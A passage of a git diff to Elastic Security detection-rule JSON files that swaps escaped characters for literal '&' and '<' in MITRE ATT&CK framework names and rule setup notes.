pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_107.json b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_107.json index c293160b3e6..586b2666d69 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_107.json +++ b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_107.json @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_1.json b/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_1.json index 44ac91ecb43..229d7650b20 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_1.json +++ b/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_1.json @@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_1.json b/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_1.json index 15c9bffc94c..923f56e4b6d 100644 --- a/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_1.json +++ b/packages/security_detection_engine/kibana/security_rule/be4c5aed-90f5-4221-8bd5-7ab3a4334751_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_104.json b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_104.json index 4cbbb98b1ab..65a7017286d 100644 --- a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_104.json +++ b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_104.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_105.json b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_105.json index 4beb9059d84..9d8e2816c20 100644 --- a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_105.json +++ b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_105.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_106.json b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_106.json index e3c7635e8ba..95c9d07ca27 100644 --- a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_106.json +++ b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_106.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_107.json b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_107.json index 1930bc50080..3702d67ed8d 100644 --- a/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_107.json +++ b/packages/security_detection_engine/kibana/security_rule/be8afaed-4bcd-4e0a-b5f9-5562003dde81_107.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_102.json b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_102.json index 9f83e1d74cc..c0e4077cac9 100644 --- a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_102.json +++ b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_103.json b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_103.json index 777e577dcaa..ab75b33a839 100644 --- a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_103.json +++ b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_103.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_104.json b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_104.json index 61b3c6c8ae4..ab002751dfb 100644 --- a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_104.json +++ b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_205.json b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_205.json index cc46d12e725..1ad5314e59d 100644 --- a/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_205.json +++ b/packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_205.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_1.json b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_1.json index 629a43a1c7b..54c70b7b882 100644 --- a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_1.json +++ b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_1.json @@ -45,7 +45,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_2.json b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_2.json index 2fe95b34800..1beddd4908f 100644 --- a/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_2.json +++ b/packages/security_detection_engine/kibana/security_rule/bf8c007c-7dee-4842-8e9a-ee534c09d205_2.json @@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_1.json b/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_1.json index 46bcd22ae45..9aca4266be5 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_1.json +++ b/packages/security_detection_engine/kibana/security_rule/bfba5158-1fd6-4937-a205-77d96213b341_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_104.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_104.json index 229ea0f3e11..f48d3be63d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_104.json +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_104.json @@ -78,7 +78,7 @@ ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_105.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_105.json index 0304b6edb0c..a8fb1c9c851 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_105.json +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_105.json @@ -78,7 +78,7 @@ ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -113,7 +113,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_106.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_106.json index ecc2a890b2e..87ec0c126d9 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_106.json +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_106.json @@ -88,7 +88,7 @@ ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -101,7 +101,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -123,7 +123,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_107.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_107.json index 0e7229093b1..bda1252e400 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_107.json +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_107.json @@ -88,7 +88,7 @@ ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -102,7 +102,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -124,7 +124,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_108.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_108.json index 9e5140854a8..a38807c3dcf 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_108.json +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_108.json @@ -88,7 +88,7 @@ ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -103,7 +103,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -125,7 +125,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -147,7 +147,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_109.json b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_109.json index e0bbd39d06a..3a7f721a7ea 100644 --- a/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_109.json +++ b/packages/security_detection_engine/kibana/security_rule/bfeaf89b-a2a7-48a3-817f-e41829dc61ee_109.json @@ -88,7 +88,7 @@ ], "risk_score": 73, "rule_id": "bfeaf89b-a2a7-48a3-817f-e41829dc61ee", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -103,7 +103,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -125,7 +125,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -147,7 +147,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_102.json b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_102.json index 9be590bfe14..6ccd64942a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_102.json @@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_103.json b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_103.json index 20957d8ba07..b1a937fb78e 100644 --- a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_103.json @@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_104.json b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_104.json index 97829ad4cc6..e7b78a2b5c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_104.json @@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_105.json b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_105.json index c6096af24b7..b18b2d922d3 100644 --- a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_105.json @@ -51,7 +51,7 @@ ], "risk_score": 73, "rule_id": "c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_106.json b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_106.json index 79616ce880a..e4650d9b148 100644 --- a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_106.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege 